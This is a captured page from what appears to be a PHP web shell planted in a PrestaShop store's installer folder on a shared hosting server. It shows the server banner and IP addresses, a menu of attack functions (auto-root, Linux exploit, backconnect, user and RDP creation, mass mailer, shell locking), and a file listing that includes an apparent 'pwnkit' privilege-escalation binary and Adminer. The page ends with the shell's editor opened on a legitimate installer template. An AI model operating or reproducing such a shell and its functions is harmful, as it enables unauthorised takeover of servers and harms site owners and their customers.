Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.217.153
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
install /
theme /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
0
B
-r--r--r--
configure.phtml
8.42
KB
-rw----r--
database.phtml
3.15
KB
-rw----r--
footer.phtml
2.19
KB
-rw----r--
header.phtml
4.89
KB
-rw----r--
index.php
1.24
KB
-rw----r--
license.phtml
1.52
KB
-rw----r--
license_content.phtml
21.16
KB
-rw----r--
process.phtml
5.2
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
system.phtml
1.49
KB
-rw----r--
welcome.phtml
2.17
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : welcome.phtml
<?php $this->displayTemplate('header') ?> <?php if (Tools::getMemoryLimit() < Tools::getOctets('32M')): ?> <div class="warnBlock"><?php echo $this->l('PrestaShop requires at least 32 MB of memory to run: please check the memory_limit directive in your php.ini file or contact your host provider about this.'); ?></div> <?php endif; ?> <?php if ($this->can_upgrade): ?> <div class="warnBlock"> <img src="theme/img/pict_error.png" alt="" style="vertical-align: middle;" /> <?php echo $this->l( '<b>Warning: You cannot use this tool to upgrade your store anymore.</b><br /><br />You already have <b>PrestaShop version %1$s installed</b>.<br /><br />If you want to upgrade to the latest version, please read our documentation: <a href="%2$s">%2$s</a>', $this->ps_version, $this->getDocumentationUpgradeLink() ) ?></div> <?php endif; ?> <h2><?php echo $this->l('Welcome to the PrestaShop %s Installer', _PS_INSTALL_VERSION_) ?></h2> <p><?php echo $this->l('Installing PrestaShop is quick and easy. In just a few moments, you will become part of a community consisting of more than 185,000 merchants. You are on the way to creating your own unique online store that you can manage easily every day.') ?></p> <p><?php echo $this->l('If you need help, do not hesitate to check <a href="%1$s" target="_blank">our documentation</a> or to contact our support team: %2$s.', $this->getDocumentationLink(), $this->getPhone()) ?></p> <!-- List of languages --> <?php if (count($this->language->getIsoList()) > 1): ?> <h3><?php echo $this->l('Continue the installation in:') ?></h3> <select id="langList" name="language"> <?php foreach ($this->language->getIsoList() as $iso): ?> <option value="<?php echo $iso ?>" <?php if ($iso == $this->language->getLanguageIso()) echo 'selected="selected"' ?>> <?php echo $this->language->getLanguage($iso)->getMetaInformation('name') ?> </option> <?php endforeach; ?> </select> <?php endif; ?> <p><?php echo $this->l('The language selection above only applies to the Installation Assistant. Once your store is installed, you can choose the language of your store from over %d translations, all for free!', 60); ?> </p> <?php $this->displayTemplate('footer') ?>
Close